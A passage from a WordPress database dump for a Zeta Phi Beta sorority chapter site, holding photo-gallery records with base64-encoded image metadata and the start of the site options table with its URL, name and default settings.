dWV9',404,1413341289),(62,'img_0654-1',0,10,'IMG_0654-1.JPG','','IMG_0654 (1)','2014-09-29 18:48:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1NC0xLkpQRyIsImdlbmVyYXRlZCI6IjAuNDgyODk2MDAgMTQxMzM0MDkzMCJ9LCJhcGVydHVyZSI6IkYgMyIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkNhbm9uIFBvd2VyU2hvdCBBNDAwMCBJUyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IlNlcHRlbWJlciAyOSwgMjAxNCA2OjQ4IHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiNSBtbSIsImlzbyI6NDAwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNjAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',402,1413341289),(61,'img_0653-1',0,10,'IMG_0653-1.JPG','','IMG_0653 (1)','2014-09-29 18:45:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1My0xLkpQRyIsImdlbmVyYXRlZCI6IjAuNTA5ODA3MDAgMTQxMzM0MDkyOCJ9LCJhcGVydHVyZSI6IkYgMyIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkNhbm9uIFBvd2VyU2hvdCBBNDAwMCBJUyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IlNlcHRlbWJlciAyOSwgMjAxNCA2OjQ1IHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiNSBtbSIsImlzbyI6NTAwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNjAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',400,1413341289),(60,'img_0652-1',0,10,'IMG_0652-1.JPG','','IMG_0652 (1)','2014-09-29 18:39:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1Mi0xLkpQRyIsImdlbmVyYXRlZCI6IjAuNTY0NTM3MDAgMTQxMzM0MDkyNSJ9LCJhcGVydHVyZSI6IkYgMyIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkNhbm9uIFBvd2VyU2hvdCBBNDAwMCBJUyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IlNlcHRlbWJlciAyOSwgMjAxNCA2OjM5IHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiNSBtbSIsImlzbyI6NDAwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNTAgc2VjIiwiZmxhc2giOiJOb3QgZmlyZWQiLCJ0aXRsZSI6IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiLCJrZXl3b3JkcyI6ZmFsc2UsInNhdmVkIjp0cnVlfQ==',398,1413341289),(59,'program-inside-1',0,10,'Program-inside-1.jpg','','Program-inside (1)','2014-10-15 02:35:57',0,0,'eyJ3aWR0aCI6MzUwNywiaGVpZ2h0IjoyNTUwLCJmdWxsIjp7IndpZHRoIjozNTA3LCJoZWlnaHQiOjI1NTB9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfUHJvZ3JhbS1pbnNpZGUtMS5qcGciLCJnZW5lcmF0ZWQiOiIwLjY4OTMwNzAwIDE0MTMzNDA1NTkifSwiYXBlcnR1cmUiOmZhbHNlLCJjcmVkaXQiOmZhbHNlLCJjYW1lcmEiOmZhbHNlLCJjYXB0aW9uIjpmYWxzZSwiY3JlYXRlZF90aW1lc3RhbXAiOmZhbHNlLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOmZhbHNlLCJpc28iOmZhbHNlLCJzaHV0dGVyX3NwZWVkIjpmYWxzZSwiZmxhc2giOmZhbHNlLCJ0aXRsZSI6ZmFsc2UsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWUsIm5nZzBkeW4tMjAweDIwMHg5MC0wMGYwdzAxMGMwMTByMTEwZjExMHIwMTB0MDNqcGciOnsid2lkdGgiOjIwMCwiaGVpZ2h0IjoxNDUsImZpbGVuYW1lIjoiUHJvZ3JhbS1pbnNpZGUtMS5qcGctbmdnaWQwMjU5LW5nZzBkeW4tMjAweDIwMHg5MC0wMGYwdzAxMGMwMTByMTEwZjExMHIwMTB0MDNqcGcuanBnIiwiZ2VuZXJhdGVkIjoiMC44MjI0NTgwMCAxNDY0NTc2MTI1In0sIm5nZzBkeW4tOTF4NjgtMDBmMHcwMTBjMDExcjExMGYxMTByMDEwdDAxMCI6eyJ3aWR0aCI6OTEsImhlaWdodCI6NjgsImZpbGVuYW1lIjoiUHJvZ3JhbS1pbnNpZGUtMS5qcGctbmdnaWQwMjU5LW5nZzBkeW4tOTF4NjgtMDBmMHcwMTBjMDExcjExMGYxMTByMDEwdDAxMC5qcGciLCJnZW5lcmF0ZWQiOiIwLjEwMTA5MjAwIDE0MjQ2Njg3MjQifSwibmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZyI6eyJ3aWR0aCI6MzAwLCJoZWlnaHQiOjIwMCwiZmlsZW5hbWUiOiJQcm9ncmFtLWluc2lkZS0xLmpwZy1uZ2dpZDAyNTktbmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjY3MTUzOTAwIDE0ODI5MjEyMTYifX0=',393,1482921216),(64,'img_0656-1',0,10,'IMG_0656-1.JPG','','IMG_0656 (1)','2014-09-29 18:51:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1Ni0xLkpQRyIsImdlbmVyYXRlZCI6IjAuNTAzNzYxMDAgMTQxMzM0MDkzMyJ9LCJhcGVydHVyZSI6IkYgMy4yIiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiQ2Fub24gUG93ZXJTaG90IEE0MDAwIElTIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiU2VwdGVtYmVyIDI5LCAyMDE0IDY6NTEgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiI3LjgzMyBtbSIsImlzbyI6NjQwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNjAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',406,1413341289),(65,'img_0657-1',0,10,'IMG_0657-1.JPG','','IMG_0657 (1)','2014-09-29 18:52:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1Ny0xLkpQRyIsImdlbmVyYXRlZCI6IjAuMzM1MTg5MDAgMTQxMzM0MDkzNSJ9LCJhcGVydHVyZSI6IkYgMy4yIiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiQ2Fub24gUG93ZXJTaG90IEE0MDAwIElTIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiU2VwdGVtYmVyIDI5LCAyMDE0IDY6NTIgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiI2LjI0NSBtbSIsImlzbyI6NjQwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNjAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',408,1413341289),(66,'img_0658-1',0,10,'IMG_0658-1.JPG','','IMG_0658 (1)','2014-09-29 18:52:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1OC0xLkpQRyIsImdlbmVyYXRlZCI6IjAuNzEyMDYzMDAgMTQxMzM0MDkzNiJ9LCJhcGVydHVyZSI6IkYgMy4yIiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiQ2Fub24gUG93ZXJTaG90IEE0MDAwIElTIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiU2VwdGVtYmVyIDI5LCAyMDE0IDY6NTIgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiI2LjI0NSBtbSIsImlzbyI6MzIwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNjAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',410,1413341289),(67,'img_0659-1',0,10,'IMG_0659-1.JPG','','IMG_0659 (1)','2014-09-29 20:09:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1OS0xLkpQRyIsImdlbmVyYXRlZCI6IjAuMTc5Nzc1MDAgMTQxMzM0MDkzOCJ9LCJhcGVydHVyZSI6IkYgNCIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkNhbm9uIFBvd2VyU2hvdCBBNDAwMCBJUyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IlNlcHRlbWJlciAyOSwgMjAxNCA4OjA5IHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiMTguNTY2IG1tIiwiaXNvIjo2NDAsInNodXR0ZXJfc3BlZWQiOiIxXC8yMCBzZWMiLCJmbGFzaCI6Ik5vdCBmaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',412,1413341289),(68,'img_0660-1',0,10,'IMG_0660-1.JPG','','IMG_0660 (1)','2014-09-29 20:09:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY2MC0xLkpQRyIsImdlbmVyYXRlZCI6IjAuNTg1Mjk1MDAgMTQxMzM0MDkzOSJ9LCJhcGVydHVyZSI6IkYgNS45IiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiQ2Fub24gUG93ZXJTaG90IEE0MDAwIElTIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiU2VwdGVtYmVyIDI5LCAyMDE0IDg6MDkgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiI0MCBtbSIsImlzbyI6ODAwLCJzaHV0dGVyX3NwZWVkIjoiMVwvMjAgc2VjIiwiZmxhc2giOiJOb3QgZmlyZWQiLCJ0aXRsZSI6IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiLCJrZXl3b3JkcyI6ZmFsc2UsInNhdmVkIjp0cnVlfQ==',414,1413341289),(69,'img_0661-1',0,10,'IMG_0661-1.JPG','','IMG_0661 (1)','2014-09-29 20:23:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY2MS0xLkpQRyIsImdlbmVyYXRlZCI6IjAuMDg4MTIzMDAgMTQxMzM0MDk0MSJ9LCJhcGVydHVyZSI6IkYgNCIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkNhbm9uIFBvd2VyU2hvdCBBNDAwMCBJUyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IlNlcHRlbWJlciAyOSwgMjAxNCA4OjIzIHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiMTcuMjUzIG1tIiwiaXNvIjo1MDAsInNodXR0ZXJfc3BlZWQiOiIxXC8yMCBzZWMiLCJmbGFzaCI6Ik5vdCBmaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',416,1413341289),(70,'img_0662-1',0,10,'IMG_0662-1.JPG','','IMG_0662 (1)','2014-09-29 20:23:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY2Mi0xLkpQRyIsImdlbmVyYXRlZCI6IjAuNjQ1MDQzMDAgMTQxMzM0MDk0MiJ9LCJhcGVydHVyZSI6IkYgNC41IiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiQ2Fub24gUG93ZXJTaG90IEE0MDAwIElTIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiU2VwdGVtYmVyIDI5LCAyMDE0IDg6MjMgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiIyNS45NDEgbW0iLCJpc28iOjgwMCwic2h1dHRlcl9zcGVlZCI6IjFcLzEwIHNlYyIsImZsYXNoIjoiTm90IGZpcmVkIiwidGl0bGUiOiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiwia2V5d29yZHMiOmZhbHNlLCJzYXZlZCI6dHJ1ZX0=',418,1413341289),(71,'img_0663-1',0,10,'IMG_0663-1.JPG','','IMG_0663 (1)','2014-09-29 20:24:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY2My0xLkpQRyIsImdlbmVyYXRlZCI6IjAuMTIyMDE0MDAgMTQxMzM0MDk0NSJ9LCJhcGVydHVyZSI6IkYgNS45IiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiQ2Fub24gUG93ZXJTaG90IEE0MDAwIElTIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiU2VwdGVtYmVyIDI5LCAyMDE0IDg6MjQgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiI0MCBtbSIsImlzbyI6ODAwLCJzaHV0dGVyX3NwZWVkIjoiMVwvMTAgc2VjIiwiZmxhc2giOiJOb3QgZmlyZWQiLCJ0aXRsZSI6IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiLCJrZXl3b3JkcyI6ZmFsc2UsInNhdmVkIjp0cnVlfQ==',420,1413341289),(72,'img_0664-1',0,10,'IMG_0664-1.JPG','','IMG_0664 (1)','2014-09-29 20:52:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY2NC0xLkpQRyIsImdlbmVyYXRlZCI6IjAuMjQxNTkyMDAgMTQxMzM0MDk0NyJ9LCJhcGVydHVyZSI6IkYgNCIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkNhbm9uIFBvd2VyU2hvdCBBNDAwMCBJUyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IlNlcHRlbWJlciAyOSwgMjAxNCA4OjUyIHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiMTguMjMzIG1tIiwiaXNvIjo1MDAsInNodXR0ZXJfc3BlZWQiOiIxXC8yMCBzZWMiLCJmbGFzaCI6Ik5vdCBmaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',422,1413341290),(73,'program-inside-1-1',0,10,'Program-inside-1-1.jpg','','Program-inside (1)','2014-10-15 02:42:30',0,0,'eyJ3aWR0aCI6MzUwNywiaGVpZ2h0IjoyNTUwLCJmdWxsIjp7IndpZHRoIjozNTA3LCJoZWlnaHQiOjI1NTB9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfUHJvZ3JhbS1pbnNpZGUtMS0xLmpwZyIsImdlbmVyYXRlZCI6IjAuMTYzNDc5MDAgMTQxMzM0MDk1MiJ9LCJhcGVydHVyZSI6ZmFsc2UsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6ZmFsc2UsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6ZmFsc2UsImNvcHlyaWdodCI6ZmFsc2UsImZvY2FsX2xlbmd0aCI6ZmFsc2UsImlzbyI6ZmFsc2UsInNodXR0ZXJfc3BlZWQiOmZhbHNlLCJmbGFzaCI6ZmFsc2UsInRpdGxlIjpmYWxzZSwia2V5d29yZHMiOmZhbHNlLCJzYXZlZCI6dHJ1ZX0=',424,1413341290),(74,'program-outside-1',0,10,'Program-outside-1.jpg','','Program-outside (1)','2014-10-15 02:42:35',0,0,'eyJ3aWR0aCI6MzUwNywiaGVpZ2h0IjoyNTUwLCJmdWxsIjp7IndpZHRoIjozNTA3LCJoZWlnaHQiOjI1NTB9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfUHJvZ3JhbS1vdXRzaWRlLTEuanBnIiwiZ2VuZXJhdGVkIjoiMC40MTM1NjMwMCAxNDEzMzQwOTU3In0sImFwZXJ0dXJlIjpmYWxzZSwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjpmYWxzZSwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjpmYWxzZSwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjpmYWxzZSwiaXNvIjpmYWxzZSwic2h1dHRlcl9zcGVlZCI6ZmFsc2UsImZsYXNoIjpmYWxzZSwidGl0bGUiOmZhbHNlLCJrZXl3b3JkcyI6ZmFsc2UsInNhdmVkIjp0cnVlfQ==',426,1413341290),(75,'lgz-spring-2015-intake-class-jpg',0,11,'LGZ-Spring-2015-Intake-Class.jpg','','LGZ Spring 2015 Intake Class.jpg','2015-05-14 12:27:03',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjY0MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjY0MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19MR1otU3ByaW5nLTIwMTUtSW50YWtlLUNsYXNzLmpwZyIsImdlbmVyYXRlZCI6IjAuNjkzMzA0MDAgMTQzMTYwNjQyMyJ9LCJhcGVydHVyZSI6ZmFsc2UsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6ZmFsc2UsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6ZmFsc2UsImNvcHlyaWdodCI6ZmFsc2UsImZvY2FsX2xlbmd0aCI6ZmFsc2UsImlzbyI6ZmFsc2UsInNodXR0ZXJfc3BlZWQiOmZhbHNlLCJmbGFzaCI6ZmFsc2UsInRpdGxlIjpmYWxzZSwia2V5d29yZHMiOmZhbHNlLCJzYXZlZCI6dHJ1ZX0=',508,1431607201),(76,'lgz-spring-2015-jpg',0,11,'LGZ-spring-2015.jpg','','LGZ spring 2015.jpg','2015-05-13 20:14:00',0,0,'eyJ3aWR0aCI6MzI2NCwiaGVpZ2h0IjoyNDQ4LCJmdWxsIjp7IndpZHRoIjozMjY0LCJoZWlnaHQiOjI0NDh9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfTEdaLXNwcmluZy0yMDE1LmpwZyIsImdlbmVyYXRlZCI6IjAuNzk0ODA4MDAgMTQzMTYwNzA4MyJ9LCJhcGVydHVyZSI6IkYgMi40IiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiaVBob25lIDVjIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiTWF5IDEzLCAyMDE1IDg6MTQgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiI0LjEyIG1tIiwiaXNvIjo0MDAsInNodXR0ZXJfc3BlZWQiOiIxXC8yMCBzZWMiLCJmbGFzaCI6Ik5vdCBmaXJlZCIsInRpdGxlIjpmYWxzZSwia2V5d29yZHMiOmZhbHNlLCJzYXZlZCI6dHJ1ZX0=',511,1431607201),(77,'silly-chapter-jpg',0,11,'silly-chapter.jpg','','silly chapter.jpg','2015-05-14 12:38:05',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjY0MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjY0MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19zaWxseS1jaGFwdGVyLmpwZyIsImdlbmVyYXRlZCI6IjAuMDI4MzUxMDAgMTQzMTYwNzA4NiJ9LCJhcGVydHVyZSI6ZmFsc2UsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6ZmFsc2UsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6ZmFsc2UsImNvcHlyaWdodCI6ZmFsc2UsImZvY2FsX2xlbmd0aCI6ZmFsc2UsImlzbyI6ZmFsc2UsInNodXR0ZXJfc3BlZWQiOmZhbHNlLCJmbGFzaCI6ZmFsc2UsInRpdGxlIjpmYWxzZSwia2V5d29yZHMiOmZhbHNlLCJzYXZlZCI6dHJ1ZX0=',513,1431607202),(78,'state-director-jpg',0,11,'state-director.jpg','','state director.jpg','2015-05-14 12:38:07',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjY0MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjY0MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19zdGF0ZS1kaXJlY3Rvci5qcGciLCJnZW5lcmF0ZWQiOiIwLjUyNjY3MTAwIDE0MzE2MDcwODcifSwiYXBlcnR1cmUiOmZhbHNlLCJjcmVkaXQiOmZhbHNlLCJjYW1lcmEiOmZhbHNlLCJjYXB0aW9uIjpmYWxzZSwiY3JlYXRlZF90aW1lc3RhbXAiOmZhbHNlLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOmZhbHNlLCJpc28iOmZhbHNlLCJzaHV0dGVyX3NwZWVkIjpmYWxzZSwiZmxhc2giOmZhbHNlLCJ0aXRsZSI6ZmFsc2UsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',515,1431607202),(79,'up-close-cake-jpg',0,11,'up-close-cake.jpg','','up close cake.jpg','2015-05-13 20:01:00',0,0,'eyJ3aWR0aCI6MzI2NCwiaGVpZ2h0IjoyNDQ4LCJmdWxsIjp7IndpZHRoIjozMjY0LCJoZWlnaHQiOjI0NDh9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfdXAtY2xvc2UtY2FrZS5qcGciLCJnZW5lcmF0ZWQiOiIwLjc5OTk2NzAwIDE0MzE2MDcwOTQifSwiYXBlcnR1cmUiOiJGIDIuNCIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6ImlQaG9uZSA1YyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6Ik1heSAxMywgMjAxNSA4OjAxIHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiNC4xMiBtbSIsImlzbyI6MTI1LCJzaHV0dGVyX3NwZWVkIjoiMVwvMjAgc2VjIiwiZmxhc2giOiJOb3QgZmlyZWQiLCJ0aXRsZSI6ZmFsc2UsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWV9',517,1431607202);
/*!40000 ALTER TABLE `lwz_ngg_pictures` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_options`
--

DROP TABLE IF EXISTS `lwz_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM AUTO_INCREMENT=511271 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_options`
--

LOCK TABLES `lwz_options` WRITE;
/*!40000 ALTER TABLE `lwz_options` DISABLE KEYS */;
INSERT INTO `lwz_options` VALUES (1,'siteurl','https://zphiblgz.org','yes'),(2,'home','https://zphiblgz.org','yes'),(3,'blogname','Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter','yes'),(4,'blogdescription','Lambda Gamma Zeta of Howard County','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','pr@zphiblgz.org','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','Y-m-d','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i 